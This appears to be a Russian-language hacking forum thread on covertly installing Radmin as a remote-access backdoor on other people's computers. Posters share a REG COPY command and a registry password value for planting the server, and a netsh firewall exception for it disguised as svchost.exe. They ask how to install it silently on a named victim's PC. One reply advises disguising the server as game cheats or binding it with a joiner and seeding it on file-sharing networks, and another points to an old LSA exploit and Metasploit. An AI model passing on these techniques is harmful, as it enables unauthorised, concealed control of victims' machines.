Вот по поводу этого можно по точнее объяснить?? На некоторых компах пробовал сразу пишет - А на большенстве других пишет выполняю так: в cmd строку пишу: REG COPY \\ip kompa vlokale [xx.xxx.xxx.xxx]\HKLM\SYSTEM\RAdmin HKLM\Software\Hacker Создал у себя в реестре ветку в SOFTWARE ничего не добавляется!!! Что хотите сказать у них (примерно 10 компов пробовал) пути другие к радмину в реестре????
Ребята, а это правда, что 3-я версия практически неуязвим ? Недавно было кнференция и там представители REDMIN так хвалили безопаснотсь. Еще сказали, что выложили в инет и сказали кто сможет подключится - даем приз и никто не смог взломать пароль к серверу. P.S. Нет ничего неуязвимиго - не катит ?
Как сделать, чтобы пароль не спрашивал? Пробую писать 0, а он не двоичный код... "Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce, 1a что на что изменить?
Изменил пароль следующим образом: установил обычный радмин у себя, установил нужный мне пароль в настройках сервера, сохранил строку реестра [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin] в settings.reg Внутри сети всё работает на ура, развлекаю народ разными флешками. xD Видимо аутпост и ему подобные, данная коняшка не пробивает, ну раз не видел рабочего стола с иконкой аутпоста в трее, значит и не работает, а вот касппер на многих компах стоит, что и увидел. Проблема состоит в следующем: ПК жертвы: известно доменное имя, IP адрес постоянный (внешний и внутренний), пользователь (возможно есть пароль), цвет, модель, операционка Vista Home Premium. использует VPN соединение для инета, как и я, у меня XP Pro SP3. Отправить эту деревянную коняшку и активизировать на том ПК, не составляет труда, вероятно, скоро будет доступ к этому ПК, но очень на короткое время. Наличие действующего там RAdmina не определяется... Результат, полное отсутствие результата. Что посоветуете? Запись в реестре XP и Vista имеет разницу?
Добрый день! так у кого получилась эта всё зделать с radmin am 3,2??? если да то подскашите как, потомушта у Радмина 3,2 нет таких ДЛЛак как AdmDll.dll, raddrv.dll
Народ а ктонить может сделать скрытую установку аналога радмин TeamViewer??? Или еще: нужно чтобы имя сервера в процессах r_server.exe было переименовано, допустим в svchost.exe
С внешкой работает отлично!!! Только в висте пришлось ручками добавлять исключение во встроенный файер, автоматом не встал и работать не давал. netsh firewall add allowedprogram "%SYSTEMROOT%/svchost.exe" "Remote Administrator Server" ENABLE Господа, подскажите эту строчку для висты? А то автоматом не добовляется в браунмаудер... Что можно добавить к этому пакету, что бы так же тихо и без палева динамический IP спокойно палить? Рекомендуют PSSender 1.04 но в инете все ссылки битые, если кто заметит рабочую ссылку, сообщите пожалуйсто.
Здравствуйте Всем. В сети в одном из компов расшарена стандартная папка SharedDocs, в нее я залил radmin, что нужно сделать, чтобы удаленно его там установить?
"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce, 1a есть какойнибудь hex-редактор, что-бы другой пароль вставить?
Как это можно сделать ?! Наверное я сейчас начну тебе учить плохим вещам , но я вижу ты сам этого желаешь то что ты залили туда своего радмина ещё ничего не значит , он может лежать там годами , и юзер даже если его найдёт то врядли его запустит ! Делается это проще , первые способы я описывал ТУТ и ТУТ , но есть ещё более поганенький способ , это впаривание радмиа , то есть , все мы знаем , что в сети очень много читарастов (ух как же я их ненавижу) , так вот берёшь радмин-сервер переименовываешь его в cheats (Super Cheats) и тд , затем кидаешь на файлообменник или в DC++ , и все дела , можно ещё взять Джойнер и склеить своего радмина с читами , тоже не плохой будет результат , вывод честный игрок не будет качать эту хрень , а читерастик да ещё и не опытный с удовольствием скачает и запустит ! Можно , но у нас в локалке походу админы закрыли 445 порт , сколько я не сканирую сеть , да и не только свою сеть но и другие сети в инете , все сканеры выдают одно и тоже что 445 порт закрыт , и я уже давно ни вижу ни одного диапозона с открытым 445 портом !!! (((
Ты что прикалываешься ? тут в теме прикреплённый архив , http://www.stopxaker-com.na.by/showthread.php?t=175 и LSA Service Exploit старая уязвимость года 2004 . Качай новый Метаспоит !